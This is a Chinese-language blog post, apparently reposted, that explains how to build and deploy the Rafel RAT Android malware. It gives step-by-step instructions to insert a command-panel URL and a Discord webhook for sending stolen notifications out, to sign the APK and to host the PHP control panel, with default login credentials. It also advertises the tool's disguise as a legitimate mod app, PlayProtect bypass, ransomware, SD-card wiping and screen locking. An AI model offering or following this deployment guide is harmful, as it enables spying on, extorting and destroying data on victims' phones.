偶然看到,两篇新闻报道此工具: https://research.checkpoint.com/2024/rafel-rat-android-malware-from-espionage-to-ransomware-operations/ https://mp.weixin.qq.com/s/Zbwhl1AULD3nE622y9tLLA 有两种方法搭建,修改编译项目和反编译修改再编译,哪一种都可以,需要一台服务器挂载web端即可 其他功能未测试 更换壁纸正常使用 Android Studio 构建 Apk
  • 在 Android Studio 中打开项目BlackMart
  • 将command.php服务器的链接放在 InternalService.class 类中
  • 现在打开NotificationListener.java并输入替换为您的 discord webhook url
  • 构建项目
  • Zipalign 并签署 Apk…
使用 ApkEasyTool 构建 Apk:
  • 下载BlackMartapk并使用反编译Apktool并导航至smali_classes2\com\velociraptor\raptor
  • 打开InternalService.smali
  • 将其替换为您的面板网址const-string v0,“ https://your-webpanel-url/public/commands.php ”
  • 现在打开NotificationListener.smali并输入替换为您的 discord webhook url
构建服务器
  • 将服务器文件夹中的文件上传到您的 HostingPanel
  • 现在打开login.php
  • 输入用户名Hande密码Ercel
  • 注意:确保您的网站托管网站使用 Https 并且应具有有效连接…我推荐 000webhost.com
  • 现在可以使用面板发送命令并在之后刷新
主要特点:
  • 管理员权限
  • 将应用程序添加到白名单(忽略电池优化)
  • 看起来像合法的 Mod 应用
  • 即使应用程序关闭,仍在后台运行(在某些设备上可能无法运行)
  • 辅助功能(导致某些设备出现错误 –> 忽略它)
  • 支持 Android v5 – v12
  • 无需端口转发
  • 获取唤醒锁
  • 完全无法检测
  • 绕过 PlayProtect
  • 擦除 SD 卡
  • 锁定设备屏幕
  • 更换壁纸
  • 勒索软件
  • 震动装置
  • 删除通话记录
  • 通过 Discord 通知受害者
  • 窃取通知(通过 discord 发送)
  • 添加自动启动(poco、xiaomi、oppo、vivo、LeV、Honor)

视频教程

声明:本站所有文章,如无特殊说明或标注,均来源与互联网。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。